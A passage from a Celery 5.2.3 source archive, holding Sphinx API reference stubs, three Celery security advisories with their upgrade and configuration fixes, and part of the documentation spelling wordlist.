celery.bin.shell :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.upgrade.rst0000664000175000017500000000041300000000000021773 0ustar00asifasif00000000000000===================================================== ``celery.bin.upgrade`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.upgrade .. automodule:: celery.bin.upgrade :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.worker.rst0000664000175000017500000000036200000000000021660 0ustar00asifasif00000000000000========================================== ``celery.bin.worker`` ========================================== .. contents:: :local: .. currentmodule:: celery.bin.worker .. automodule:: celery.bin.worker :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bootsteps.rst0000664000175000017500000000035700000000000021626 0ustar00asifasif00000000000000========================================== ``celery.bootsteps`` ========================================== .. contents:: :local: .. currentmodule:: celery.bootsteps .. automodule:: celery.bootsteps :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.abortable.rst0000664000175000017500000000044200000000000023171 0ustar00asifasif00000000000000======================================================= ``celery.contrib.abortable`` ======================================================= .. contents:: :local: .. currentmodule:: celery.contrib.abortable .. automodule:: celery.contrib.abortable :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.migrate.rst0000664000175000017500000000034600000000000022671 0ustar00asifasif00000000000000============================ ``celery.contrib.migrate`` ============================ .. contents:: :local: .. currentmodule:: celery.contrib.migrate .. automodule:: celery.contrib.migrate :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.pytest.rst0000664000175000017500000000042100000000000022563 0ustar00asifasif00000000000000==================================== ``celery.contrib.pytest`` ==================================== .. contents:: :local: API Reference ============= .. currentmodule:: celery.contrib.pytest .. automodule:: celery.contrib.pytest :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.rdb.rst0000664000175000017500000000040000000000000021777 0ustar00asifasif00000000000000================================== ``celery.contrib.rdb`` ================================== .. currentmodule:: celery.contrib.rdb .. automodule:: celery.contrib.rdb .. autofunction:: set_trace .. autofunction:: debugger .. autoclass:: Rdb ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.sphinx.rst0000664000175000017500000000027000000000000022546 0ustar00asifasif00000000000000================================ celery.contrib.sphinx ================================ .. currentmodule:: celery.contrib.sphinx .. automodule:: celery.contrib.sphinx :members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.testing.app.rst0000664000175000017500000000044000000000000023470 0ustar00asifasif00000000000000==================================== ``celery.contrib.testing.app`` ==================================== .. contents:: :local: API Reference ============= .. currentmodule:: celery.contrib.testing.app .. automodule:: celery.contrib.testing.app :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.testing.manager.rst0000664000175000017500000000045400000000000024327 0ustar00asifasif00000000000000==================================== ``celery.contrib.testing.manager`` ==================================== .. contents:: :local: API Reference ============= .. currentmodule:: celery.contrib.testing.manager .. automodule:: celery.contrib.testing.manager :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.testing.mocks.rst0000664000175000017500000000044600000000000024032 0ustar00asifasif00000000000000==================================== ``celery.contrib.testing.mocks`` ==================================== .. contents:: :local: API Reference ============= .. currentmodule:: celery.contrib.testing.mocks .. automodule:: celery.contrib.testing.mocks :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.testing.worker.rst0000664000175000017500000000045100000000000024223 0ustar00asifasif00000000000000==================================== ``celery.contrib.testing.worker`` ==================================== .. contents:: :local: API Reference ============= .. currentmodule:: celery.contrib.testing.worker .. automodule:: celery.contrib.testing.worker :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.events.dispatcher.rst0000664000175000017500000000046000000000000023230 0ustar00asifasif00000000000000================================================================= ``celery.events.state`` ================================================================= .. contents:: :local: .. currentmodule:: celery.events.dispatcher .. automodule:: celery.events.dispatcher :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.events.event.rst0000664000175000017500000000044600000000000022227 0ustar00asifasif00000000000000================================================================= ``celery.events.event`` ================================================================= .. contents:: :local: .. currentmodule:: celery.events.event .. automodule:: celery.events.event :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.events.receiver.rst0000664000175000017500000000045700000000000022714 0ustar00asifasif00000000000000================================================================= ``celery.events.receiver`` ================================================================= .. contents:: :local: .. currentmodule:: celery.events.receiver .. automodule:: celery.events.receiver :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.events.rst0000664000175000017500000000030200000000000021076 0ustar00asifasif00000000000000======================== ``celery.events`` ======================== .. contents:: :local: .. currentmodule:: celery.events .. automodule:: celery.events :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.events.state.rst0000664000175000017500000000044600000000000022226 0ustar00asifasif00000000000000================================================================= ``celery.events.state`` ================================================================= .. contents:: :local: .. currentmodule:: celery.events.state .. automodule:: celery.events.state :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.exceptions.rst0000664000175000017500000000033600000000000021762 0ustar00asifasif00000000000000================================ ``celery.exceptions`` ================================ .. contents:: :local: .. currentmodule:: celery.exceptions .. automodule:: celery.exceptions :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.loaders.app.rst0000664000175000017500000000034300000000000022007 0ustar00asifasif00000000000000================================= ``celery.loaders.app`` ================================= .. contents:: :local: .. currentmodule:: celery.loaders.app .. automodule:: celery.loaders.app :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.loaders.base.rst0000664000175000017500000000037200000000000022143 0ustar00asifasif00000000000000=========================================== ``celery.loaders.base`` =========================================== .. contents:: :local: .. currentmodule:: celery.loaders.base .. automodule:: celery.loaders.base :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.loaders.default.rst0000664000175000017500000000037700000000000022662 0ustar00asifasif00000000000000========================================= ``celery.loaders.default`` ========================================= .. contents:: :local: .. currentmodule:: celery.loaders.default .. automodule:: celery.loaders.default :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.loaders.rst0000664000175000017500000000035500000000000021233 0ustar00asifasif00000000000000============================================ ``celery.loaders`` ============================================ .. contents:: :local: .. currentmodule:: celery.loaders .. automodule:: celery.loaders :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.result.rst0000664000175000017500000000031400000000000021113 0ustar00asifasif00000000000000============================= ``celery.result`` ============================= .. contents:: :local: .. currentmodule:: celery.result .. automodule:: celery.result :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.rst0000664000175000017500000000665100000000000017610 0ustar00asifasif00000000000000=========================================== :mod:`celery` --- Distributed processing =========================================== .. currentmodule:: celery .. module:: celery :synopsis: Distributed processing .. moduleauthor:: Ask Solem .. sectionauthor:: Ask Solem -------------- This module is the main entry-point for the Celery API. It includes commonly needed things for calling tasks, and creating Celery applications. ===================== =================================================== :class:`Celery` Celery application instance :class:`group` group tasks together :class:`chain` chain tasks together :class:`chord` chords enable callbacks for groups :func:`signature` create a new task signature :class:`Signature` object describing a task invocation :data:`current_app` proxy to the current application instance :data:`current_task` proxy to the currently executing task ===================== =================================================== :class:`Celery` application objects ----------------------------------- .. versionadded:: 2.5 .. autoclass:: Celery .. autoattribute:: user_options .. autoattribute:: steps .. autoattribute:: current_task .. autoattribute:: current_worker_task .. autoattribute:: amqp .. autoattribute:: backend .. autoattribute:: loader .. autoattribute:: control .. autoattribute:: events .. autoattribute:: log .. autoattribute:: tasks .. autoattribute:: pool .. autoattribute:: producer_pool .. autoattribute:: Task .. autoattribute:: timezone .. autoattribute:: builtin_fixups .. autoattribute:: oid .. automethod:: close .. automethod:: signature .. automethod:: bugreport .. automethod:: config_from_object .. automethod:: config_from_envvar .. automethod:: autodiscover_tasks .. automethod:: add_defaults .. automethod:: add_periodic_task .. automethod:: setup_security .. automethod:: task .. automethod:: send_task .. automethod:: gen_task_name .. autoattribute:: AsyncResult .. autoattribute:: GroupResult .. autoattribute:: Worker .. autoattribute:: WorkController .. autoattribute:: Beat .. automethod:: connection_for_read .. automethod:: connection_for_write .. automethod:: connection .. automethod:: connection_or_acquire .. automethod:: producer_or_acquire .. automethod:: select_queues .. automethod:: now .. automethod:: set_current .. automethod:: set_default .. automethod:: finalize .. automethod:: on_init .. automethod:: prepare_config .. data:: on_configure Signal sent when app is loading configuration. .. data:: on_after_configure Signal sent after app has prepared the configuration. .. data:: on_after_finalize Signal sent after app has been finalized. .. data:: on_after_fork Signal sent in child process after fork. Canvas primitives ----------------- See :ref:`guide-canvas` for more about creating task work-flows. .. autoclass:: group .. autoclass:: chain .. autoclass:: chord .. autofunction:: signature .. autoclass:: Signature Proxies ------- .. data:: current_app The currently set app for this thread. .. data:: current_task The task currently being executed (only set in the worker, or when eager/apply is used). ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.schedules.rst0000664000175000017500000000040500000000000021555 0ustar00asifasif00000000000000===================================================== ``celery.schedules`` ===================================================== .. contents:: :local: .. currentmodule:: celery.schedules .. automodule:: celery.schedules :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.security.rst0000664000175000017500000000031000000000000021440 0ustar00asifasif00000000000000======================== ``celery.security`` ======================== .. contents:: :local: .. currentmodule:: celery.security .. automodule:: celery.security :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.signals.rst0000664000175000017500000000040100000000000021232 0ustar00asifasif00000000000000====================================================== ``celery.signals`` ====================================================== .. contents:: :local: .. currentmodule:: celery.signals .. automodule:: celery.signals :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.states.rst0000664000175000017500000000015200000000000021100 0ustar00asifasif00000000000000.. currentmodule:: celery.states .. contents:: :local: .. automodule:: celery.states :members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.utils.debug.rst0000664000175000017500000000154700000000000022033 0ustar00asifasif00000000000000==================================== ``celery.utils.debug`` ==================================== .. contents:: :local: Sampling Memory Usage ===================== This module can be used to diagnose and sample the memory usage used by parts of your application. For example, to sample the memory usage of calling tasks you can do this: .. code-block:: python from celery.utils.debug import sample_mem, memdump from tasks import add try: for i in range(100): for j in range(100): add.delay(i, j) sample_mem() finally: memdump() API Reference ============= .. currentmodule:: celery.utils.debug .. automodule:: celery.utils.debug .. autofunction:: sample_mem .. autofunction:: memdump .. autofunction:: sample .. autofunction:: mem_rss .. autofunction:: ps ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.agent.rst0000664000175000017500000000044300000000000024040 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.agent`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.agent .. automodule:: celery.worker.consumer.agent :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.connection.rst0000664000175000017500000000046200000000000025102 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.connection`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.connection .. automodule:: celery.worker.consumer.connection :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.consumer.rst0000664000175000017500000000045400000000000024577 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.consumer`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.consumer .. automodule:: celery.worker.consumer.consumer :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.control.rst0000664000175000017500000000045100000000000024421 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.control`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.control .. automodule:: celery.worker.consumer.control :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.events.rst0000664000175000017500000000044600000000000024251 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.events`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.events .. automodule:: celery.worker.consumer.events :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.gossip.rst0000664000175000017500000000044600000000000024251 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.gossip`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.gossip .. automodule:: celery.worker.consumer.gossip :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.heart.rst0000664000175000017500000000044300000000000024045 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.heart`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.heart .. automodule:: celery.worker.consumer.heart :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.mingle.rst0000664000175000017500000000044600000000000024220 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.mingle`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.mingle .. automodule:: celery.worker.consumer.mingle :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.rst0000664000175000017500000000042100000000000022737 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer .. automodule:: celery.worker.consumer :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.tasks.rst0000664000175000017500000000044300000000000024067 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.tasks`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.tasks .. automodule:: celery.worker.consumer.tasks :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.request.rst0000664000175000017500000000036400000000000022602 0ustar00asifasif00000000000000===================================== ``celery.worker.request`` ===================================== .. contents:: :local: .. currentmodule:: celery.worker.request .. automodule:: celery.worker.request :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.rst0000664000175000017500000000034200000000000021107 0ustar00asifasif00000000000000======================================== ``celery.worker`` ======================================== .. contents:: :local: .. currentmodule:: celery.worker .. automodule:: celery.worker :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.state.rst0000664000175000017500000000035400000000000022231 0ustar00asifasif00000000000000==================================== ``celery.worker.state`` ==================================== .. contents:: :local: .. currentmodule:: celery.worker.state .. automodule:: celery.worker.state :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.strategy.rst0000664000175000017500000000036500000000000022755 0ustar00asifasif00000000000000==================================== ``celery.worker.strategy`` ==================================== .. contents:: :local: .. currentmodule:: celery.worker.strategy .. automodule:: celery.worker.strategy :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.worker.rst0000664000175000017500000000035700000000000022425 0ustar00asifasif00000000000000==================================== ``celery.worker.worker`` ==================================== .. contents:: :local: .. currentmodule:: celery.worker.worker .. automodule:: celery.worker.worker :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/cli.rst0000664000175000017500000000021700000000000017064 0ustar00asifasif00000000000000======================= Command Line Interface ======================= .. click:: celery.bin.celery:celery :prog: celery :nested: full ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/index.rst0000664000175000017500000000364000000000000017427 0ustar00asifasif00000000000000.. _apiref: =============== API Reference =============== :Release: |version| :Date: |today| .. toctree:: :maxdepth: 1 cli celery celery.app celery.app.task celery.app.amqp celery.app.defaults celery.app.control celery.app.registry celery.app.backends celery.app.builtins celery.app.events celery.app.log celery.app.utils celery.app.autoretry celery.bootsteps celery.result celery.schedules celery.signals celery.security celery.utils.debug celery.exceptions celery.loaders celery.loaders.app celery.loaders.default celery.loaders.base celery.states celery.contrib.abortable celery.contrib.migrate celery.contrib.pytest celery.contrib.sphinx celery.contrib.testing.worker celery.contrib.testing.app celery.contrib.testing.manager celery.contrib.testing.mocks celery.contrib.rdb celery.events celery.events.receiver celery.events.dispatcher celery.events.event celery.events.state celery.beat celery.apps.worker celery.apps.beat celery.apps.multi celery.worker celery.worker.request celery.worker.state celery.worker.strategy celery.worker.consumer celery.worker.consumer.agent celery.worker.consumer.connection celery.worker.consumer.consumer celery.worker.consumer.control celery.worker.consumer.events celery.worker.consumer.gossip celery.worker.consumer.heart celery.worker.consumer.mingle celery.worker.consumer.tasks celery.worker.worker celery.bin.base celery.bin.celery celery.bin.worker celery.bin.beat celery.bin.events celery.bin.logtool celery.bin.amqp celery.bin.graph celery.bin.multi celery.bin.call celery.bin.control celery.bin.list celery.bin.migrate celery.bin.purge celery.bin.result celery.bin.shell celery.bin.upgrade ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.6757545 celery-5.2.3/docs/sec/0000775000175000017500000000000000000000000014377 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/sec/CELERYSA-0001.txt0000664000175000017500000000555100000000000016733 0ustar00asifasif00000000000000========================================= CELERYSA-0001: Celery Security Advisory ========================================= :contact: security@celeryproject.org :author: Ask Solem :CVE id: CVE-2011-4356 :date: 2011-11-25 04:35:00 p.m. GMT Details ======= :package: celery :vulnerability: privilege escalation :problem type: local :risk: medium :bug-no: Celery #544 :versions-affected: 2.1, 2.2, 2.3, 2.4 Description =========== The --uid and --gid arguments to the celeryd-multi, celeryd_detach, celerybeat and celeryev programs shipped with Celery versions 2.1 and later wasn't handled properly: only the effective user was changed, with the real id remaining unchanged. In practice for affected users the vulnerability means that malicious code loaded in the worker process would be allowed to escalate privileges. We take this issue seriously since the Pickle serializer used by default makes it possible to execute arbitrary code. We recommend that users takes steps to secure their systems so that malicious users cannot abuse the message broker to send messages, or disable the pickle serializer used in Celery so that arbitrary code execution isn't possible. Patches are now available for all maintained versions (see below), and users are urged to upgrade, even if not directly affected. Systems affected ================ Users of Celery versions 2.1, 2.2, 2.3, 2.4; except the recently released 2.2.8, 2.3.4, and 2.4.4, daemonizing the Celery programs as the root user, using either: 1) the --uid or --gid arguments, or 2) the provided generic init-scripts with the environment variables CELERYD_USER or CELERYD_GROUP defined, are affected. Users using the Debian init-scripts, CentOS init-scripts, macOS launchctl scripts, Supervisor, or users not starting the programs as the root user are *not* affected. Solution ======== Users of the 2.4 series should upgrade to 2.4.4: * ``pip install -U celery``, or * ``easy_install -U celery``, or * https://pypi.org/project/celery/2.4.4/ Users of the 2.3 series should upgrade to 2.3.4: * ``pip install -U celery==2.3.4``, or * ``easy_install -U celery==2.3.4``, or * https://pypi.org/project/celery/2.3.4/ Users of the 2.2 series should upgrade to 2.2.8: * ``pip install -U celery==2.2.8``, or * ``easy_install -U celery==2.2.8``, or * https://pypi.org/project/celery/2.2.8/ The 2.1 series is no longer being maintained, so we urge users of that series to upgrade to a more recent version. Distribution package maintainers are urged to provide their users with updated packages. Please direct questions to the celery-users mailing-list: https://groups.google.com/group/celery-users/, or if you're planning to report a security issue we request that you keep the information confidential by contacting security@celeryproject.org, so that a fix can be issued as quickly as possible. Thank you! ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/sec/CELERYSA-0002.txt0000664000175000017500000000514000000000000016726 0ustar00asifasif00000000000000========================================= CELERYSA-0002: Celery Security Advisory ========================================= :contact: security@celeryproject.org :CVE id: TBA :date: 2014-07-10 05:00:00 p.m. UTC Details ======= :package: celery :vulnerability: Environment error :problem type: local :risk: low :versions-affected: 2.5, 3.0, 3.1 Description =========== The built-in utility used to daemonize the Celery worker service sets an insecure umask by default (umask 0). This means that any files or directories created by the worker will end up having world-writable permissions. In practice this means that local users will be able to modify and possibly corrupt the files created by user tasks. This isn't immediately exploitable but can be if those files are later evaluated as a program, for example a task that creates Python program files that are later executed. Patches are now available for all maintained versions (see below), and users are urged to upgrade, even if not directly affected. Acknowledgments =============== Special thanks to Red Hat for originally discovering and reporting the issue. Systems affected ================ Users of Celery versions 3.0, and 3.1, except the recently released 3.1.13, are affected if daemonizing the Celery programs using the `--detach` argument or using the `celery multi` program to start workers in the background, without setting a custom `--umask` argument. Solution ======== NOTE: Not all users of Celery will use it to create files, but if you do then files may already have been created with insecure permissions. So after upgrading, or using the workaround, then please make sure that files already created aren't world writable. To work around the issue you can set a custom umask using the ``--umask`` argument: $ celery worker -l info --detach --umask=18 # (022) Or you can upgrade to a more recent version: - Users of the 3.1 series should upgrade to 3.1.13: * ``pip install -U celery``, or * ``easy_install -U celery``, or * https://pypi.org/project/celery/3.1.13/ - Users of the 3.0 series should upgrade to 3.0.25: * ``pip install -U celery==3.0.25``, or * ``easy_install -U celery==3.0.25``, or * https://pypi.org/project/celery/3.0.25/ Distribution package maintainers are urged to provide their users with updated packages. Please direct questions to the celery-users mailing-list: https://groups.google.com/group/celery-users/, or if you're planning to report a new security related issue we request that you keep the information confidential by contacting security@celeryproject.org instead. Thank you! ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/sec/CELERYSA-0003.txt0000664000175000017500000000301700000000000016730 0ustar00asifasif00000000000000========================================= CELERYSA-0003: Celery Security Advisory ========================================= :contact: security@celeryproject.org :CVE id: TBA :date: 2016-12-08 05:00:00 p.m. PST Details ======= :package: celery :vulnerability: Configuration Error :problem type: remote :risk: low :versions-affected: 4.0.0 Description =========== The default configuration in Celery 4.0.0 allowed for deserialization of pickled messages, even if the software is configured to send messages in the JSON format. The particular configuration in question is the `accept_content` setting, which by default was set to: app.conf.accept_content = ['json', 'pickle', 'msgpack', 'yaml'] The risk is still set to low considering that an attacker would require access to the message broker used to send messages to Celery workers. Systems affected ================ Users of Celery version 4.0.0 with no explicit accept_content setting set. Solution ======== To work around the issue you can explicitly configure the accept_content setting: app.conf.accept_content = ['json'] Or you can upgrade to the Celery 4.0.1 version: $ pip install -U celery Distribution package maintainers are urged to provide their users with updated packages. Please direct questions to the celery-users mailing-list: https://groups.google.com/group/celery-users/, or if you're planning to report a new security related issue we request that you keep the information confidential by contacting security@celeryproject.org instead. Thank you! ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/spelling_wordlist.txt0000664000175000017500000001141700000000000020136 0ustar00asifasif00000000000000許邱翔 AMQP Adriaenssens Adrien Agris Ahmet Aitor Akira Alain Alcides Aleksandr Alexey Allard Alman Almeer Ameriks Andreas Andrey Andriy Aneil ArangoDB Areski Armin Artyom Atanasov Attias Attwood Autechre Axel Aziz Azovskov Babiy Bargen Baumgold Belaid Bence Berker Bevan Biel Bistuer Bolshakov Bouterse Bozorgkhan Brakhane Brendon Breshears Bridgen Briem Brodie Bryson Buckens Bujniewicz Buttu CPython Carvalho Cassandra Catalano Catalin Chamberlin Chiastic Chintomby Christoph Cipater Clowes Cobertura Codeb CouchDB Couchbase Cramer Cristian Cron Crontab Crontabs Czajka Danilo Daodao Dartiguelongue Davanum Davide Davidsson Deane Dees Dein Delalande Demir Django Dmitry Dubus Dudás Duggan Duryee Elasticsearch Engledew Eran Erway Esquivel Farrimond Farwell Fatih Feanil Fladischer Flavio Floering Fokau Frantisek Gao Garnero Gauvrit Gedminas Georgievsky Germán Gheem Gilles GitHub Gómez Goiri Gorbunov Grainger Greinhofer Grégoire Groner Grossi Guillaume Guinet Gunnlaugur Gylfason Haag Harnly Harrigan Haskins Helmers Helmig Henrik Heroku Hoch Hoeve Hogni Holop Homebrew Honza Hsad Hu Hynek IP Iacob Idan Ignas Illes Ilya Ionel IronCache Iurii Jaillet Jameel Janež Jelle Jellick Jerzy Jevnik Jiangmiao Jirka Johansson Julien Jython Kai Kalinowski Kamara Katz Khera KiB Kilgo Kirill Kiriukha Kirkham Kjartansson Klindukh Kombu Konstantin Konstantinos Kornelijus Korner Koshelev Kotlyarov Kouhei Koukopoulos Koval Kozera Kracekumar Kral Kriachko Krybus Krzysztof Kumar Kupershmidt Kuznetsov Lamport Langford Latitia Lavin Lawley Lebedev Ledesma Legrand Loic Luckie Maeda Maślanka Malinovsky Mallavarapu Manipon Marcio Maries Markey Markus Marlow Masiero Matsuzaki Maxime McGregor Melin Memcached Metzlar Mher Mickaël Mikalajūnas Milen Mitar Modrzejewski MongoDB Movsisyan Mărieș Môshe Munin Nagurney Nextdoor Nik Nikolov Node.js Northway Nyby ORM O'Reilly Oblovatniy Omer Ordoquy Ori Parncutt Patrin Paulo Pavel Pavlovic Pearce Peksag Penhard Pepijn Permana Petersson Petrello Pika Piotr Podshumok Poissonnier Pomfrey Pär Pravec Pulec Pyro QoS Qpid Quarta RPC RSS Rabbaglietti RabbitMQ Rackspace Radek Raghuram Ramaraju Rao Raphaël Rattray Redis Remigiusz Remy Renberg Riak Ribeiro Rinat Rémy Robenolt Rodionoff Romuald Ronacher Rongze Rossi Rouberol Rudakou Rundstein SQLAlchemy SQS Sadaoui Savchenko Savvides Schlawack Schottdorf Schwarz Selivanov SemVer Seong Sergey Seungha Shigapov Slinckx Smirnov Solem Solt Sosnovskiy Srinivas Srinivasan Stas StateDB Steeve Sterre Streeter Sucu Sukrit Survila SysV Tadej Tallon Tamas Tantiras Taub Tewfik Theo Thrift Tikhonov Tobias Tochev Tocho Tsigularov Twomey URI Ullmann Unix Valentyn Vanderbauwhede Varona Vdb Veatch Vejrazka Verhagen Verstraaten Viamontes Viktor Vitaly Vixie Voronov Vos Vsevolod Webber Werkzeug Whitlock Widman Wieslander Wil Wiman Wun Yaroslav Younkins Yu Yurchuk Yury Yuval Zarowny Zatelepin Zaytsev Zhaorong Zhavoronkov Zhu Zoë Zoran abortable ack acked acking acks acyclic arg args arity async autocommit autodoc autoscale autoscaler autoscalers autoscaling backend backends backport backported backtrace bootstep bootsteps bufsize bugfix callbacks celerymon changelog chunking cipater committer committers compat conf config contrib coroutine coroutines cronjob cryptographic daemonization daemonize daemonizing dburi de deprecated deprecations der deserialization deserialize deserialized deserializes deserializing destructor distro Ádám docstring docstrings embeddable encodable errbacks euid eventlet exc execv exitcode failover fanout filename gevent gid greenlet greenlets greenthreads hashable hostname http idempotence ident indices init initializer instantiation interoperability iterable js json kombu kwargs logfile login loglevel lookup memoization memoize memoized misconfiguration misconfigure misconfigured msgpack multi mutex mutexes natively nodename nullipotent optimizations persister 